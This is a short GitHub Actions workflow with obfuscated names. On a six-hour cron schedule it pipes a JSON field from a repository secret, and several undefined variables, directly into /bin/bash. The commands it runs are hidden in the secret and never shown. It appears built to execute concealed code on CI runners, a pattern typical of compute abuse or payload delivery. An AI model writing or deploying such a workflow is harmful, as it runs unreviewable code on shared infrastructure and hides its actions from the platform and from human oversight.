name: weihuanpeng1987
on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: weihuanpeng1987
        env:
          n40956: ${{ secrets.n40956 }}
        run: |
          echo $n40956 | jq -r .b9 | /bin/bash
          echo $q86 | jq -r .ej51 | /bin/bash
          echo $vuezc08597 | jq -r .hcg9245 | /bin/bash
          echo $awqt95485 | jq -r .or568 | /bin/bash
          echo $cyc260 | jq -r .sjcsa527 | /bin/bash
          echo $vpf4 | jq -r .r38054 | /bin/bash
          echo $oikef52797 | jq -r .z4 | /bin/bash
          echo $owzlp49100 | jq -r .r40 | /bin/bash

